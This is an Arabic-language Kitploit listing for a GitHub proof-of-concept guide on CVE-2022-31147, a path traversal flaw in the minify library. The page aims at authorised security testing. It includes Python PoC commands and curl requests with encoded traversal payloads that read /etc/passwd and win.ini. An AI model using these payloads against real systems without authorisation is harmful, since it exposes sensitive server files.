Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Webapp_Pentast — CVE-2022-31147 هي ثغرة اجتياز مسار (Path Traversal) في matthiasmullie/minify. يساعد هذا الدليل فرق الأمن على اختبار قراءة الملفات الاعتباطية على Linux وWindows باستخدام Python وcurl. ويغطي التوليد الآلي للحمولات، والتحقق اليدوي، والممارسات الآمنة لتقييم الثغرات. | Kitploit
أدوات/GitHubGitHub/amhar-hckr/webapp_pentast
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubamhar-hckr/webapp_pentast

Webapp_Pentast

CVE-2022-31147 هي ثغرة اجتياز مسار (Path Traversal) في matthiasmullie/minify. يساعد هذا الدليل فرق الأمن على اختبار قراءة الملفات الاعتباطية على Linux وWindows باستخدام Python وcurl. ويغطي التوليد الآلي للحمولات، والتحقق اليدوي، والممارسات الآمنة لتقييم الثغرات.

عرض المستودع
منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دليل إثبات المفهوم والاختبار اليدوي لـ CVE-2022-31147

يوفر هذا الدليل منهجيات شاملة لاختبار CVE-2022-31147، وهي ثغرة حرجة من نوع اجتياز المسار (Path Traversal) تؤثر على مكتبة matthiasmullie/minify المستخدمة على نطاق واسع. تسمح هذه الثغرة للمهاجمين باستغلال عدم كفاية تنظيف المدخلات في نقطة نهاية minify، مما قد يتيح قراءة ملفات عشوائية على كل من خوادم Linux وWindows. صُمم هذا الدليل خصيصًا لمحترفي الأمن، ومختبري الاختراق، والباحثين الذين يسعون إلى تقييم مدى تعرض تطبيقات الويب لهذا التهديد.

يتمثل جوهر الدليل في سكربت آلي بلغة Python لإثبات المفهوم، يعمل على توليد واختبار مجموعة واسعة من حمولات الاجتياز بشكل منهجي. تستخدم هذه الحمولات أعماقًا مختلفة من اجتياز الدليل (../)، وأنظمة ترميز متعددة (مثل ترميز URL والترميز المزدوج)، وتنويعات مختلفة لنقطة النهاية (بما في ذلك الامتدادات المزيفة ومعاملات الاستعلام) لتجاوز آليات التوجيه والتصفية الشائعة. من خلال الاستفادة من هذه التقنيات، يزيد السكربت من احتمالية اكتشاف الإعدادات الضعيفة، حتى في البيئات المحمية بجدران حماية تطبيقات الويب الأساسية أو منطق توجيه مخصص.

يتم تعزيز دقة الاكتشاف بشكل إضافي عبر استدلالات مدمجة تحلل محتوى الاستجابة بحثًا عن علامات ملفات معروفة. بالنسبة للأهداف التي تعمل بنظام Linux، يبحث السكربت عن أنماط مميزة لملف /etc/passwd أو ملفات حساسة أخرى، بينما يبحث في أنظمة Windows عن مؤشرات داخل ملفات مثل win.ini. يضمن هذا النهج تحديد الاستغلال الناجح بشكل موثوق، مما يقلل من النتائج الإيجابية الخاطئة ويبسط عملية التحقق.

بالإضافة إلى الاختبار الآلي، يوضح الدليل تقنيات التحقق اليدوي باستخدام curl، مما يمكّن الممارسين من صياغة وإرسال طلبات مخصصة لإجراء تحليل مستهدف أو للتحقق من النتائج بشكل مستقل. وتُشدد التوصيات في جميع أنحاء الدليل على أهمية الاختبار الآمن والمصرح به، بما في ذلك ضرورة إجراء التقييمات فقط على الأنظمة التي مُنح إذن صريح لاختبارها.

صُمم الدليل لدعم كل من التحقق السريع والتحليل المتعمق، بحيث يستوعب أهداف ملفات مخصصة واستراتيجيات تجاوز متقدمة. يمكن دمجه في سير عمل أوسع لتقييم الثغرات الأمنية، مما يوفر رؤى قابلة للتنفيذ للمعالجة وإدارة المخاطر. من خلال اتباع المنهجيات المقدمة، يمكن لفرق الأمن تحديد حالات التعرض لثغرة CVE-2022-31147 والتحقق منها ومعالجتها في بيئاتها بشكل فعال، مما يعزز الوضع الأمني العام لتطبيقات الويب الخاصة بها.

إثبات المفهوم الآلي بلغة Python

مثال لهدف يعمل بنظام Linux

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --linux --file /etc/passwd

مثال لهدف يعمل بنظام Windows

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --windows --file C:\Windows\win.ini

اختبار أكثر أمانًا (موصى به)

أنشئ ملفًا غير ضار على الخادم، ثم حاول قراءته:

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --file /var/www/test.txt

الاختبار اليدوي باستخدام curl

اجتياز المسار في Linux

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd"

اجتياز المسار في Windows

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../windows/win.ini"

أنماط تجاوز بديلة

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/%2e%2e/../%2e%2e/../../etc/passwd"
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd.css"

ملاحظات

  • استبدل https://yourdomain.tld/cdn/minify بعنوان URL الهدف الفعلي الخاص بك.
  • لإجراء اختبار أكثر أمانًا، استخدم ملفًا تتحكم فيه وتعرف أنه موجود على الخادم.
  • احصل دائمًا على إذن قبل الاختبار على أي نظام.

المراجع

  • CVE-2022-31147
تنزيل الأداة